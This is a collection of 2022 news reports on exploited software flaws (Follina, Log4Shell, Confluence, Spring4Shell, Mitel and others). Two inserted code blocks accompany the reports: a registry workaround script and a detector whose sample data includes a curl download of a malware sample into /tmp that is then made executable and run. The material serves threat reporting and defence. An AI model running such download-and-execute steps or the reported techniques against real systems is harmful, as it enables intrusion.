Hackers Exploit Mitel VoIP Zero-Day in Likely Ransomware Attack
25.6.22  Exploit  
Thehackernews
A suspected ransomware intrusion attempt against an unnamed target leveraged a Mitel VoIP appliance as an entry point to achieve remote code execution and gain initial access to the environment.

The findings come from cybersecurity firm CrowdStrike, which traced the source of the attack to a Linux-based Mitel VoIP device sitting on the network perimeter, while also identifying a previously unknown exploit as well as a couple of anti-forensic measures adopted by the actor on the device to erase traces of their actions.

The zero-day exploit in question is tracked as CVE-2022-29499 and was fixed by Mitel in April 2022 by means of a remediation script that it shared with customers. It's rated 9.8 out of 10 for severity on the CVSS vulnerability scoring system, making it a critical shortcoming.

"A vulnerability has been identified in the Mitel Service Appliance component of MiVoice Connect (Mitel Service Appliances – SA 100, SA 400, and Virtual SA) which could allow a malicious actor to perform remote code execution (CVE-2022-29499) within the context of the Service Appliance," the company noted in an advisory.

The exploit entailed two HTTP GET requests — which are used to retrieve a specific resource from a server — to trigger remote code execution by fetching rogue commands from the attacker-controlled infrastructure.

In the incident investigated by CrowdStrike, the attacker is said to have used the exploit to create a reverse shell, utilizing it to launch a web shell ("pdf_import.php") on the VoIP appliance and download the open source Chisel proxy tool.

The binary was then executed, but only after renaming it to "memdump" in an attempt to fly under the radar and use the utility as a "reverse proxy to allow the threat actor to pivot further into the environment via the VOIP device." But subsequent detection of the activity halted their progress and prevented them from moving laterally across the network.

The disclosure arrives less than two weeks after German penetration testing firm SySS revealed two flaws in Mitel 6800/6900 desk phones (CVE-2022-29854 and CVE-2022-29855) that, if successfully exploited, could have allowed an attacker to gain root privileges on the devices.

"Timely patching is critical to protect perimeter devices. However, when threat actors exploit an undocumented vulnerability, timely patching becomes irrelevant," CrowdStrike researcher Patrick Bennett said.

"Critical assets should be isolated from perimeter devices to the extent possible. Ideally, if a threat actor compromises a perimeter device, it should not be possible to access critical assets via 'one hop' from the compromised device."

Update: According to security researcher Kevin Beaumont, there are nearly 21,500 publicly accessible Mitel devices online, with the majority located in the U.S., followed by the U.K., Canada, France, and Australia.


Log4Shell Still Being Exploited to Hack VMWare Servers to Exfiltrate Sensitive Data
24.6.22  Exploit  
Thehackernews

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Coast Guard Cyber Command (CGCYBER), on Thursday released a joint advisory warning of continued attempts on the part of threat actors to exploit the Log4Shell flaw in VMware Horizon servers to breach target networks.

"Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and [Unified Access Gateway] servers," the agencies said. "As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command-and-control (C2)."

In one instance, the adversary is said to have been able to move laterally inside the victim network, obtain access to a disaster recovery network, and collect and exfiltrate sensitive law enforcement data.

Log4Shell, tracked as CVE-2021-44228 (CVSS score: 10.0), is a remote code execution vulnerability affecting the Apache Log4j logging library that's used by a wide range of consumers and enterprise services, websites, applications, and other products.

Successful exploitation of the flaw could enable an attacker to send a specially-crafted command to an affected system, enabling the actors to execute malicious code and seize control of the target.

Based on information gathered as part of two incident response engagements, the agencies said that the attackers weaponized the exploit to drop rogue payloads, including PowerShell scripts and a remote access tool dubbed "hmsvc.exe" that's equipped with capabilities to log keystrokes and deploy additional malware.

"The malware can function as a C2 tunneling proxy, allowing a remote operator to pivot to other systems and move further into a network," the agencies noted, adding it also offers a "graphical user interface (GUI) access over a target Windows system's desktop."

The PowerShell scripts, observed in the production environment of a second organization, facilitated lateral movement, enabling the APT actors to implant loader malware containing executables that include the ability to remotely monitor a system's desktop, gain reverse shell access, exfiltrate data, and upload and execute next-stage binaries.

Furthermore, the adversarial collective leveraged CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager that came to light in April 2022, to implant the Dingo J-spy web shell.

Ongoing Log4Shell-related activity even after more than six months suggests that the flaw is of high interest to attackers, including state-sponsored advanced persistent threat (APT) actors, who have opportunistically targeted unpatched servers to gain an initial foothold for follow-on activity.

According to cybersecurity company ExtraHop, Log4j vulnerabilities have been subjected to relentless scanning attempts, with financial and healthcare sectors emerging as an outsized market for potential attacks.

"Log4j is here to stay, we will see attackers leveraging it again and again," IBM-owned Randori said in an April 2022 report. "Log4j buried deep into layers and layers of shared third-party code, leading us to the conclusion that we'll see instances of the Log4j vulnerability being exploited in services used by organizations that use a lot of open source."


RIG Exploit Kit Now Infects Victims' PCs With Dridex Instead of Raccoon Stealer
22.6.22  Exploit  
Thehackernews
The operators behind the Rig Exploit Kit have swapped the Raccoon Stealer malware for the Dridex financial trojan as part of an ongoing campaign that commenced in January 2022.

The switch in modus operandi, spotted by Romanian company Bitdefender, comes in the wake of Raccoon Stealer temporarily closing the project after one of its team members responsible for critical operations passed away in the Russo-Ukrainian war in March 2022.

The Rig Exploit Kit is notable for its abuse of browser exploits to distribute an array of malware. First spotted in 2019, Raccoon Stealer is a credential-stealing trojan that's advertised and sold on underground forums as a malware-as-a-service (MaaS) for $200 a month.

That said, the Raccoon Stealer actors are already working on a second version that's expected to be "rewritten from scratch and optimized." But the void left by the malware's exit is being filled by other information stealers such as RedLine Stealer and Vidar.

Dridex (aka Bugat and Cridex), for its part, has the capability to download additional payloads, infiltrate browsers to steal customer login information entered on banking websites, capture screenshots, and log keystrokes, among others, through different modules that allow its functionality to be extended at will.

In April 2022, Bitdefender discovered another Rig Exploit Kit campaign distributing the RedLine Stealer trojan by exploiting an Internet Explorer flaw patched by Microsoft last year (CVE-2021-26411).

That's not all. Last May, a separate campaign exploited two scripting engine vulnerabilities in unpatched Internet Explorer browsers (CVE-2019-0752 and CVE-2018-8174) to deliver a malware called WastedLoader, so named for its similarities to WastedLocker but lacking the ransomware component.

"This once again demonstrates that threat actors are agile and quick to adapt to change," the cybersecurity firm said. "By design, Rig Exploit Kit allows for rapid substitution of payloads in case of detection or compromise, which helps cyber criminal groups recover from disruption or environmental changes."


State-Backed Hackers Exploit Microsoft 'Follina' Bug to Target Entities in Europe and U.S.
6.6.22  Exploit  
Thehackernews
A suspected state-aligned threat actor has been attributed to a new set of attacks exploiting the Microsoft Office "Follina" vulnerability to target government entities in Europe and the U.S.

Enterprise security firm Proofpoint said it blocked attempts at exploiting the remote code execution flaw, which is being tracked as CVE-2022-30190 (CVSS score: 7.8). No less than 1,000 phishing messages containing a lure document were sent to the targets.

"This campaign masqueraded as a salary increase and utilized an RTF with the exploit payload downloaded from 45.76.53[.]253," the company said in a series of tweets.

The payload, which manifests in the form of a PowerShell script, is Base64-encoded and functions as a downloader to retrieve a second PowerShell script from a remote server named "seller-notification[.]live."

"This script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil[tration] to 45.77.156[.]179," the company added.

The phishing campaign has not been linked to a previously known group, but Proofpoint said it was mounted by a nation-state actor based on the specificity of the targeting and the PowerShell payload's wide-ranging reconnaissance capabilities.

The development follows active exploitation attempts by a Chinese threat actor tracked as TA413 to deliver weaponized ZIP archives with malware-rigged Microsoft Word documents.

The Follina vulnerability, which leverages the "ms-msdt:" protocol URI scheme to remotely take control of target devices, remains unpatched, with Microsoft urging customers to disable the protocol to prevent the attack vector.

"Proofpoint continues to see targeted attacks leveraging CVE-2022-30190," Sherrod DeGrippo, vice president of threat research, said in a statement shared with The Hacker News.

"The extensive reconnaissance conducted by the second PowerShell script demonstrates an actor interested in a large variety of software on a target's computer. This, coupled with the tight targeting of European government and local U.S. governments, led us to suspect this campaign has a state aligned nexus."


Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability
3.6.22  Exploit  
Thehackernews
Atlassian has warned of a critical unpatched remote code execution vulnerability impacting Confluence Server and Data Center products that it said is being actively exploited in the wild.

The Australian software company credited cybersecurity firm Volexity for identifying the flaw, which is being tracked as CVE-2022-26134.

"Atlassian has been made aware of current active exploitation of a critical severity unauthenticated remote code execution vulnerability in Confluence Data Center and Server," it said in an advisory.

"There are currently no fixed versions of Confluence Server and Data Center available. Atlassian is working with the highest priority to issue a fix." Specifics of the security flaw have been withheld until a software patch is available.

Confluence Server version 7.18.0 is known to have been exploited in the wild, although Confluence Server and Data Center versions 7.4.0 and later are potentially vulnerable.

In the absence of a fix, Atlassian is urging customers to restrict Confluence Server and Data Center instances from the internet or consider disabling Confluence Server and Data Center instances altogether.

Volexity, in an independent disclosure, said it detected the activity over the Memorial Day weekend in the U.S. as part of an incident response investigation.

The attack chain involved leveraging the Atlassian zero-day exploit — a command injection vulnerability — to achieve unauthenticated remote code execution on the server, enabling the threat actor to use the foothold to drop the Behinder web shell.

"Behinder provides very powerful capabilities to attackers, including memory-only webshells and built-in support for interaction with Meterpreter and Cobalt Strike," the researchers said. "At the same time, it does not allow persistence, which means a reboot or service restart will wipe it out."

Subsequently, the web shell is said to have been employed as a conduit to deploy two additional web shells to disk, including China Chopper and a custom file upload shell to exfiltrate arbitrary files to a remote server.

The development comes less than a year after another critical remote code execution flaw in Atlassian Confluence (CVE-2021-26084, CVSS score: 9.8) was actively weaponized in the wild to install cryptocurrency miners on compromised servers.

"By exploiting this kind of vulnerability, attackers can gain direct access to highly sensitive systems and networks," Volexity said. "Further, these systems can often be difficult to investigate, as they lack the appropriate monitoring or logging capabilities."


Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability
1.6.22  Exploit  
Thehackernews
An advanced persistent threat (APT) actor aligned with Chinese state interests has been observed weaponizing the new zero-day flaw in Microsoft Office to achieve code execution on affected systems.

"TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using URLs to deliver ZIP archives which contain Word Documents that use the technique," enterprise security firm Proofpoint said in a tweet.

"Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan Administration and use the domain tibet-gov.web[.]app."

TA413 is best known for its campaigns aimed at the Tibetan diaspora to deliver implants such as Exile RAT and Sepulcher as well as a rogue Firefox browser extension dubbed FriarFox.

The high-severity security flaw, dubbed Follina and tracked as CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code execution that abuses the "ms-msdt:" protocol URI scheme to execute arbitrary code.

Specifically, the attack makes it possible for threat actors to circumvent Protected View safeguards for suspicious files by simply changing the document to a Rich Text Format (RTF) file, thereby allowing the injected code to be run without even opening the document via the Preview Pane in Windows File Explorer.

While the bug gained widespread attention last week, evidence points to the active exploitation of the diagnostic tool flaw in real-world attacks targeting Russian users over a month ago on April 12, 2022, when it was disclosed to Microsoft.

The company, however, did not deem it a security issue and closed the vulnerability submission report, citing reasons that the MSDT utility required a passkey provided by a support technician before it can execute payloads.

The vulnerability exists in all currently supported Windows versions and can be exploited via Microsoft Office versions Office 2013 through Office 2021 and Office Professional Plus editions.

"This elegant attack is designed to bypass security products and fly under the radar by leveraging Microsoft Office's remote template feature and the ms-msdt protocol to execute malicious code, all without the need for macros," Malwarebytes' Jerome Segura noted.

Although there is no official patch available at this point, Microsoft has recommended disabling the MSDT URL protocol to prevent the attack vector. Additionally, it's been advised to turn off the Preview Pane in File Explorer.

"What makes 'Follina' stand out is that this exploit does not take advantage of Office macros and, therefore, it works even in environments where macros have been disabled entirely," Nikolas Cemerikic of Immersive Labs said.

"All that's required for the exploit to take effect is for a user to open and view the Word document, or to view a preview of the document using the Windows Explorer Preview Pane. Since the latter does not require Word to launch fully, this effectively becomes a zero-click attack."


Microsoft Releases Workarounds for Office Vulnerability Under Active Exploitation
31.5.22  Exploit  
Thehackernews

Microsoft on Monday published guidance for a newly discovered zero-day security flaw in its Office productivity suite that could be exploited to achieve code execution on affected systems.

The weakness, now assigned the identifier CVE-2022-30190, is rated 7.8 out of 10 for severity on the CVSS vulnerability scoring system. Microsoft Office versions Office 2013, Office 2016, Office 2019, and Office 2021, as well as Professional Plus editions, are impacted.

"To help protect customers, we've published CVE-2022-30190 and additional guidance here," a Microsoft spokesperson told The Hacker News in an emailed statement.

The Follina vulnerability, which came to light late last week, involved a real-world exploit that leveraged the shortcoming in a weaponized Word document to execute arbitrary PowerShell code by making use of the "ms-msdt:" URI scheme. The sample was uploaded to VirusTotal from Belarus.

But first signs of exploitation of the flaw date back to April 12, 2022, when a second sample was uploaded to the malware database. This artifact is believed to have targeted a user in Russia with a malicious Word document ("приглашение на интервью.doc") that masqueraded as an interview invitation with Sputnik Radio.

"A remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word," Microsoft said in an advisory for CVE-2022-30190.

"An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights."

The tech giant credited crazyman, a member of the Shadow Chaser Group, for reporting the flaw on April 12, coinciding with the discovery of the in-the-wild exploit targeting Russian users, indicating the company had been already aware of the vulnerability.

Indeed, according to screenshots shared by the researcher on Twitter, Microsoft closed the report on April 21, 2022 stating "the issue has been fixed," while also dismissing the flaw as "not a security issue" since it requires a passkey provided by a support technician when starting the diagnostic tool.

Besides releasing detection rules for Microsoft Defender for Endpoint, the Redmond-based company has offered workarounds in its guidance to disable the MSDT URL protocol via a Windows Registry modification.
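The registry-based workaround referred to here (and in the Follina reports above), as an added example that is not code from the article or from Microsoft's published guidance: it exports the ms-msdt: protocol handler key, deletes it, verifies the removal, and can put the key back from the export once a fixed build is installed. The backup location is an assumption.

```powershell
<#
 Added example (not from the article, and not Microsoft's own guidance text):
 disables the ms-msdt: URL protocol handler by exporting and deleting its
 HKEY_CLASSES_ROOT key, and restores it from that export with -Restore.
 Run from an elevated PowerShell prompt. The backup location is an assumption.
#>
param([switch]$Restore)

$key       = 'HKEY_CLASSES_ROOT\ms-msdt'
$keyPath   = "Registry::$key"
$backupDir = Join-Path $env:ProgramData 'msdt-workaround'   # assumed backup location
$backup    = Join-Path $backupDir 'ms-msdt.reg'

if ($Restore) {
    if (-not (Test-Path $backup)) { throw "no backup found at $backup" }
    reg.exe import $backup
    if ($LASTEXITCODE -ne 0) { throw 'restore failed' }
    Write-Host "ms-msdt handler restored from $backup"
    return
}

if (-not (Test-Path $keyPath)) {
    Write-Host 'ms-msdt handler is not registered; nothing to do.'
    return
}

# Record the command the handler currently runs, for the change log.
$cmd = (Get-ItemProperty -Path "$keyPath\shell\open\command" -ErrorAction SilentlyContinue).'(default)'
if ($cmd) { Write-Host "current handler command: $cmd" }

New-Item -ItemType Directory -Path $backupDir -Force | Out-Null
# Export first so the handler can be put back once a fixed build is installed.
reg.exe export $key $backup /y
if ($LASTEXITCODE -ne 0) { throw 'backup failed; handler left in place' }

reg.exe delete $key /f
if ($LASTEXITCODE -ne 0) { throw 'delete failed' }

# Confirm the workaround took effect before reporting success.
if (Test-Path $keyPath) { throw 'ms-msdt key still present after delete' }
Write-Host "ms-msdt handler removed; backup at $backup"
```

Removing the key only stops the ms-msdt: scheme from launching MSDT; it does not change the Preview Pane setting the articles also recommend turning off.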

"If the calling application is a Microsoft Office application, by default, Microsoft Office opens documents from the internet in Protected View or Application Guard for Office, both of which prevent the current attack," Microsoft said.

This is not the first time Microsoft Office protocol schemes like "ms-msdt:" have come under the scanner for their potential misuse. Earlier this January, German security company SySS disclosed how it's possible to open files directly via specially crafted URLs such as "ms-excel:ofv|u|https://192.168.1.10/poc[.]xls."


EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities
31.5.22  Exploit  
Thehackernews

A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).

"The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities," AT&T Alien Labs said in a technical write-up published last week. "Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices."

First disclosed by Securonix in March and later by Fortinet, Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ.

Enemybot, which is capable of carrying out DDoS attacks, draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant reveals that it's made up of four different components -

A Python module to download dependencies and compile the malware for different OS architectures
The core botnet section
An obfuscation segment designed to encode and decode the malware's strings, and
A command-and-control functionality to receive attack commands and fetch additional payloads
"In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing [a] shell command," the researchers said, pointing to a new "adb_infect" function. ADB refers to Android Debug Bridge, a command-line utility used to communicate with an Android device.

Also incorporated is a new scanner function that's engineered to search random IP addresses associated with public-facing assets for potential vulnerabilities, while also taking into account new bugs within days of them being publicly disclosed.

Besides the Log4Shell vulnerabilities that came to light in December 2021, this includes recently patched flaws in Razer Sila routers (no CVE), VMware Workspace ONE Access (CVE-2022-22954), and F5 BIG-IP (CVE-2022-1388) as well as weaknesses in WordPress plugins like Video Synchro PDF.

Other weaponized security shortcomings are below -

CVE-2022-22947 (CVSS score: 10.0) - A code injection vulnerability in Spring Cloud Gateway
CVE-2021-4039 (CVSS score: 9.8) - A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware
CVE-2022-25075 (CVSS score: 9.8) - A command injection vulnerability in TOTOLink A3000RU wireless router
CVE-2021-36356 (CVSS score: 9.8) - A remote code execution vulnerability in Kramer VIAware
CVE-2021-35064 (CVSS score: 9.8) - A privilege escalation and command execution vulnerability in Kramer VIAware
CVE-2020-7961 (CVSS score: 9.8) - A remote code execution vulnerability in Liferay Portal
What's more, the botnet's source code has been shared on GitHub, making it widely available to other threat actors. "I assume no responsibility for any damages caused by this program," the project's README file reads. "This is posted under Apache license and is also considered art."

"Keksec's Enemybot appears to be just starting to spread, however due to the authors' rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers," the researchers said.

"This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread."


Watch Out! Researchers Spot New Microsoft Office Zero-Day Exploit in the Wild
31.5.22  Exploit  
Thehackernews

Cybersecurity researchers are calling attention to a zero-day flaw in Microsoft Office that could be abused to achieve arbitrary code execution on affected Windows systems.

The vulnerability came to light after an independent cybersecurity research team known as nao_sec uncovered a Word document ("05-2022-0438.doc") that was uploaded to VirusTotal from an IP address in Belarus.

"It uses Word's external link to load the HTML and then uses the 'ms-msdt' scheme to execute PowerShell code," the researchers noted in a series of tweets last week.

According to security researcher Kevin Beaumont, who dubbed the flaw "Follina," the maldoc leverages Word's remote template feature to fetch an HTML file from a server, which then makes use of the "ms-msdt://" URI scheme to run the malicious payload.

The shortcoming has been so named because the malicious sample references 0438, which is the area code of Follina, a municipality in the Italian city of Treviso.

MSDT is short for Microsoft Support Diagnostics Tool, a utility that's used to troubleshoot and collect diagnostic data for analysis by support professionals to resolve a problem.

"There's a lot going on here, but the first problem is Microsoft Word is executing the code via msdt (a support tool) even if macros are disabled," Beaumont explained.

"Protected View does kick in, although if you change the document to RTF form, it runs without even opening the document (via the preview tab in Explorer) let alone Protected View," the researcher added.

In a standalone analysis, cybersecurity company Huntress Labs detailed the attack flow, noting the HTML file ("RDF842l.html") that triggers the exploit originated from a now-unreachable domain named "xmlformats[.]com."

"A Rich Text Format file (.RTF) could trigger the invocation of this exploit with just the Preview Pane within Windows Explorer," Huntress Labs' John Hammond said. "Much like CVE-2021-40444, this extends the severity of this threat by not just 'single-click' to exploit, but potentially with a 'zero-click' trigger."

Multiple Microsoft Office versions, including Office, Office 2016, and Office 2021, are said to be affected, although other versions are expected to be vulnerable as well.

What's more, Richard Warren of NCC Group managed to demonstrate an exploit on Office Professional Pro with April 2022 patches running on an up-to-date Windows 11 machine with the preview pane enabled.

"Microsoft are going to need to patch it across all the different product offerings, and security vendors will need robust detection and blocking," Beaumont said. We have reached out to Microsoft for comment, and we'll update the story once we hear back.


Hackers Exploiting VMware Horizon to Target South Korea with NukeSped Backdoor
20.5.22  Exploit  
Thehackernews

The North Korea-backed Lazarus Group has been observed leveraging the Log4Shell vulnerability in VMware Horizon servers to deploy the NukeSped (aka Manuscrypt) implant against targets located in its southern counterpart.

"The attacker used the Log4j vulnerability on VMware Horizon products that were not applied with the security patch," AhnLab Security Emergency Response Center (ASEC) said in a new report.

The intrusions are said to have been first discovered in April, although multiple threat actors, including those aligned with China and Iran, have employed the same approach to further their objectives over the past few months.

NukeSped is a backdoor that can perform various malicious activities based on commands received from a remote attacker-controlled domain. Last year, Kaspersky disclosed a spear-phishing campaign aimed at stealing critical data from defense companies using a NukeSped variant called ThreatNeedle.

Some of the key functions of the backdoor range from capturing keystrokes and taking screenshots to accessing the device's webcam and dropping additional payloads such as information stealers.

The stealer malware, a console-based utility, is designed to exfiltrate accounts and passwords saved in web browsers like Google Chrome, Mozilla Firefox, Internet Explorer, Opera, and Naver Whale as well as information about email accounts and recently opened Microsoft Office and Hancom files.

"The attacker collected additional information by using backdoor malware NukeSped to send command line commands," the researchers said. "The collected information can be used later in lateral movement attacks."


Chinese Hackers Caught Exploiting Popular Antivirus Products to Target Telecom Sector
3.5.22  Exploit  
Thehackernews
A Chinese-aligned cyberespionage group has been observed striking the telecommunication sector in Central Asia with versions of malware such as ShadowPad and PlugX.

Cybersecurity firm SentinelOne tied the intrusions to an actor it tracks under the name "Moshen Dragon," with tactical overlaps between the collective and another threat group referred to as Nomad Panda (aka RedFoxtrot).

"PlugX and ShadowPad have a well-established history of use among Chinese-speaking threat actors primarily for espionage activity," SentinelOne's Joey Chen said. "Those tools have flexible, modular functionality and are compiled via shellcode to easily bypass traditional endpoint protection products."

ShadowPad, labeled a "masterpiece of privately sold malware in Chinese espionage," emerged as a successor to PlugX in 2015, even as variants of the latter have continually popped up as part of different campaigns associated with Chinese threat actors.

Although known to be deployed by the government-sponsored hacking group dubbed Bronze Atlas (aka APT41, Barium, or Winnti) since at least 2017, an ever-increasing number of other China-linked threat actors have joined the fray.

Earlier this year, Secureworks attributed distinct ShadowPad activity clusters to Chinese nation-state groups that operate in alignment with the Chinese Ministry of State Security (MSS) civilian intelligence agency and the People's Liberation Army (PLA).

The latest findings from SentinelOne dovetail with a previous report from Trellix in late March that revealed a RedFoxtrot attack campaign targeting telecom and defense sectors in South Asia with a new variant of PlugX malware named Talisman.

Moshen Dragon's TTPs involve the abuse of legitimate antivirus software belonging to BitDefender, Kaspersky, McAfee, Symantec, and Trend Micro to sideload ShadowPad and Talisman on compromised systems by means of a technique called DLL search order hijacking.

In the subsequent step, the hijacked DLL is used to decrypt and load the final ShadowPad or PlugX payload that resides in the same folder as that of the antivirus executable. Persistence is achieved by either creating a scheduled task or a service.

The hijacking of security products notwithstanding, other tactics adopted by the group include the use of known hacking tools and red team scripts to facilitate credential theft, lateral movement and data exfiltration. The initial access vector remains unclear as yet.

"Once the attackers have established a foothold in an organization, they proceed with lateral movement by leveraging Impacket within the network, placing a passive backdoor into the victim environment, harvesting as many credentials as possible to ensure unlimited access, and focusing on data exfiltration," Chen said.


New RIG Exploit Kit Campaign Infecting Victims' PCs with RedLine Stealer
29.4.22  Exploit  
Thehackernews
A new campaign leveraging an exploit kit has been observed abusing an Internet Explorer flaw patched by Microsoft last year to deliver the RedLine Stealer trojan.

"When executed, RedLine Stealer performs recon against the target system (including username, hardware, browsers installed, anti-virus software) and then exfiltrates data (including passwords, saved credit cards, crypto wallets, VPN logins) to a remote command and control server," Bitdefender said in a new report shared with The Hacker News.

Most of the infections are located in Brazil and Germany, followed by the U.S., Egypt, Canada, China, and Poland, among others.

Exploit kits or exploit packs are comprehensive tools that contain a collection of exploits designed to take advantage of vulnerabilities in commonly-used software by scanning infected systems for different kinds of flaws and deploying additional malware.

The primary infection method used by attackers to distribute exploit kits, in this case the Rig Exploit Kit, is through compromised websites that, when visited, drop the exploit code and ultimately deliver the RedLine Stealer payload to carry out follow-on attacks.

RIG Exploit Kit
The flaw in question is CVE-2021-26411 (CVSS score: 8.8), a memory corruption vulnerability impacting Internet Explorer that has been previously weaponized by North Korea-linked threat actors. It was addressed by Microsoft as part of its Patch Tuesday updates for March 2021.

"The RedLine Stealer sample delivered by RIG EK comes packed in multiple encryption layers [...] to avoid detection," the Romanian cybersecurity firm noted, with the unpacking of the malware progressing through as many as six stages.

RedLine Stealer, an information-stealing malware sold on underground forums, comes with features to exfiltrate passwords, cookies and credit card data saved in browsers, as well as crypto wallets, chat logs, VPN login credentials and text from files as per commands received from a remote server.

This is far from the only campaign that involves the distribution of RedLine Stealer. In February 2022, HP detailed a social engineering attack using fake Windows 11 upgrade installers to trick Windows 10 users into downloading and executing the malware.


Iranian Hackers Exploiting VMware RCE Bug to Deploy 'Core Impact' Backdoor
26.4.22  Exploit  
Thehackernews
An Iranian-linked threat actor known as Rocket Kitten has been observed actively exploiting a recently patched VMware vulnerability to gain initial access and deploy the Core Impact penetration testing tool on vulnerable systems.

Tracked as CVE-2022-22954 (CVSS score: 9.8), the critical issue concerns a case of remote code execution (RCE) vulnerability affecting VMware Workspace ONE Access and Identity Manager.

While the issue was patched by the virtualization services provider on April 6, 2022, the company cautioned users of confirmed exploitation of the flaw occurring in the wild a week later.

"A malicious actor exploiting this RCE vulnerability potentially gains an unlimited attack surface," researchers from Morphisec Labs said in a new report. "This means highest privileged access into any components of the virtualized host and guest environment."

Attack chains exploiting the flaw involve the distribution of a PowerShell-based stager, which is then used to download a next-stage payload called PowerTrash Loader that, in turn, injects the penetration testing tool, Core Impact, into memory for follow-on activities.

"The widespread use of VMWare identity access management combined with the unfettered remote access this attack provides is a recipe for devastating breaches across industries," the researchers said.

"VMWare customers should also review their VMware architecture to ensure the affected components are not accidentally published on the internet, which dramatically increases the exploitation risks."


Hackers Exploiting Spring4Shell Vulnerability to Deploy Mirai Botnet Malware
9.4.22  Exploit  
Thehackernews

The recently disclosed critical Spring4Shell vulnerability is being actively exploited by threat actors to execute the Mirai botnet malware, particularly in the Singapore region since the start of April 2022.

"The exploitation allows threat actors to download the Mirai sample to the '/tmp' folder and execute them after permission change using 'chmod,'" Trend Micro researchers Deep Patel, Nitesh Surana, Ashish Verma said in a report published Friday.

Tracked as CVE-2022-22965 (CVSS score: 9.8), the vulnerability could allow malicious actors to achieve remote code execution in Spring Core applications under non-default circumstances, granting the attackers full control over the compromised devices.
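The Trend Micro description above (a sample dropped into '/tmp', made executable with 'chmod', then run) is a generic staging pattern that host telemetry can catch regardless of which vulnerability delivered the file. The following is an added detection example, not code from Trend Micro or the article: it walks a stream of constructed process-execution events, remembers any chmod that grants execute permission on a file under a temporary directory, and flags a later execution of that same path. The event shape (timestamp, pid, resolved executable, argv) and the sample file name are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Directories where a dropped payload is commonly staged (assumed list).
TEMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class ProcEvent:
    """One process-execution record, e.g. from auditd EXECVE (constructed shape)."""
    ts: float
    pid: int
    exe: str          # resolved path of the program that was executed
    argv: List[str]   # full argument vector, argv[0] included


def is_exec_mode(mode: str) -> bool:
    """True if a chmod mode string adds an execute bit (symbolic or octal)."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        # Any odd octal digit in the last three positions sets an x bit.
        return any(int(d) & 1 for d in mode[-3:])
    return "+" in mode and "x" in mode   # e.g. +x, a+x, u+rwx


def in_temp_dir(path: str) -> bool:
    return path.startswith(TEMP_DIRS)


def detect_tmp_exec(events: List[ProcEvent]) -> List[Tuple[ProcEvent, ProcEvent]]:
    """Return (chmod_event, exec_event) pairs for files made executable in a
    temp directory and subsequently executed from that same path."""
    staged: Dict[str, ProcEvent] = {}
    hits: List[Tuple[ProcEvent, ProcEvent]] = []
    for ev in sorted(events, key=lambda e: e.ts):
        base = ev.exe.rsplit("/", 1)[-1]
        if base == "chmod":
            # First non-option argument is the mode; the rest are targets.
            args = [a for a in ev.argv[1:] if not a.startswith("-")]
            if len(args) >= 2 and is_exec_mode(args[0]):
                for target in args[1:]:
                    if in_temp_dir(target):
                        staged[target] = ev
        elif in_temp_dir(ev.exe) and ev.exe in staged:
            hits.append((staged[ev.exe], ev))
    return hits


# Constructed sample telemetry: one benign chmod, one staged-and-run payload,
# and one temp-dir execution with no preceding chmod (not flagged here).
SAMPLE_EVENTS = [
    ProcEvent(1.0, 4101, "/usr/bin/chmod", ["chmod", "644", "/home/svc/notes.txt"]),
    ProcEvent(2.0, 4102, "/usr/bin/curl", ["curl", "-o", "/tmp/mirai_sample", "http://example.invalid/x"]),
    ProcEvent(3.0, 4103, "/usr/bin/chmod", ["chmod", "+x", "/tmp/mirai_sample"]),
    ProcEvent(4.0, 4104, "/tmp/mirai_sample", ["/tmp/mirai_sample"]),
    ProcEvent(5.0, 4105, "/var/tmp/build.sh", ["/var/tmp/build.sh"]),
]

if __name__ == "__main__":
    for chmod_ev, exec_ev in detect_tmp_exec(SAMPLE_EVENTS):
        print(f"ALERT pid={exec_ev.pid} ran {exec_ev.exe} "
              f"after chmod {' '.join(chmod_ev.argv[1:])} at t={chmod_ev.ts}")
```

The detector deliberately ignores temp-directory executions that were not preceded by a permission change, to keep the example focused on the exact sequence the report describes; in production the second branch would usually raise a lower-severity signal on its own.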

The development comes as the U.S. Cybersecurity and Infrastructure Security Agency (CISA) earlier this week added the Spring4Shell vulnerability to its Known Exploited Vulnerabilities Catalog based on "evidence of active exploitation."

This is far from the first time the botnet operators have quickly moved to add newly publicized flaws to their exploit toolset. In December 2021, multiple botnets including Mirai and Kinsing were uncovered leveraging the Log4Shell vulnerability to breach susceptible servers on the internet.

Mirai, meaning "future" in Japanese, is the name given to a Linux malware that has continued to target networked smart home devices such as IP cameras and routers and link them together into a network of infected devices known as a botnet.

The IoT botnet, using the herd of hijacked hardware, can be then used to commit further attacks, including large-scale phishing attacks, cryptocurrency mining, click fraud, and distributed denial-of-service (DDoS) attacks.

